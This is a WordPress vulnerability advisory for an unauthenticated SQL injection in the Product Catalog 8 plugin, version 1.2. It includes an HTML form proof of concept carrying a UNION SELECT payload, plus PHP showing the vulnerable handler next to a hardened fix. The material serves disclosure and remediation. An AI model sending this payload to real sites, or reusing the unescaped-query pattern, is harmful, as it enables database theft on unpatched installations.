Product Catalog 8 1.2 - Unauthenticated SQL Injection
Description
$_POST['selectedCategory'] is not escaped before being used in an SQL query. The UpdateCategoryList() AJAX action is accessible to any user, including unauthenticated visitors.
Proof of Concept
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php">
<input type="text" name="selectedCategory" value="0 UNION SELECT 1,2,3,4,5,6 FROM wp_terms WHERE term_id=1">
<input type="text" name="action" value="UpdateCategoryList">
<input type="submit" value="Send">
</form>
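The following is an added illustration of the pattern the advisory describes and its hardened form; it is not the plugin's actual code. The handler name pc8_update_category_list(), the nonce action name and the query against the terms table are assumptions.

```php
<?php
// Added illustration, not Product Catalog 8's real source: a minimal WordPress
// AJAX handler reconstructed from the advisory. Function names, the nonce
// action 'pc8_category_list' and the terms query are assumptions.

// BEFORE (the pattern described): $_POST['selectedCategory'] is concatenated
// into SQL unescaped, and the action was reachable by unauthenticated callers
// through the wp_ajax_nopriv_ hook, i.e.
//   add_action( 'wp_ajax_UpdateCategoryList',        'pc8_update_category_list_vulnerable' );
//   add_action( 'wp_ajax_nopriv_UpdateCategoryList', 'pc8_update_category_list_vulnerable' );
function pc8_update_category_list_vulnerable() {
    global $wpdb;
    $category = $_POST['selectedCategory'];            // attacker-controlled string
    $rows = $wpdb->get_results(
        "SELECT term_id, name FROM {$wpdb->terms} WHERE term_id = " . $category
    );
    wp_send_json( $rows );
}

// AFTER: the value is bound through $wpdb->prepare() as an integer, the
// request must carry a valid nonce, and the nopriv hook is not registered.
// Add a current_user_can() check if the action is meant for administrators only.
function pc8_update_category_list_fixed() {
    check_ajax_referer( 'pc8_category_list', 'nonce' );   // dies on a bad/missing nonce
    $category = absint( $_POST['selectedCategory'] ?? 0 ); // coerce to non-negative int
    if ( 0 === $category ) {
        wp_send_json_error( 'invalid category', 400 );
    }
    global $wpdb;
    $rows = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT term_id, name FROM {$wpdb->terms} WHERE term_id = %d",
            $category
        )
    );
    wp_send_json_success( $rows );
}
add_action( 'wp_ajax_UpdateCategoryList', 'pc8_update_category_list_fixed' );
```

Even with prepare() in place, keeping the action off the wp_ajax_nopriv_ hook is what closes the unauthenticated path the title refers to.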

Affects Plugin

References

EXPLOITDB 40783
URL http://lenonleite.com.br/en/blog/2016/11/18/product-catalog-8-plugin-wordpress-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br
Submitter Twitter lenonleite
Views 4897
Verified No
WPVDB ID 8686

Timeline

Publicly Published 2016-11-28
Added 2016-12-06
Last Updated 2016-12-06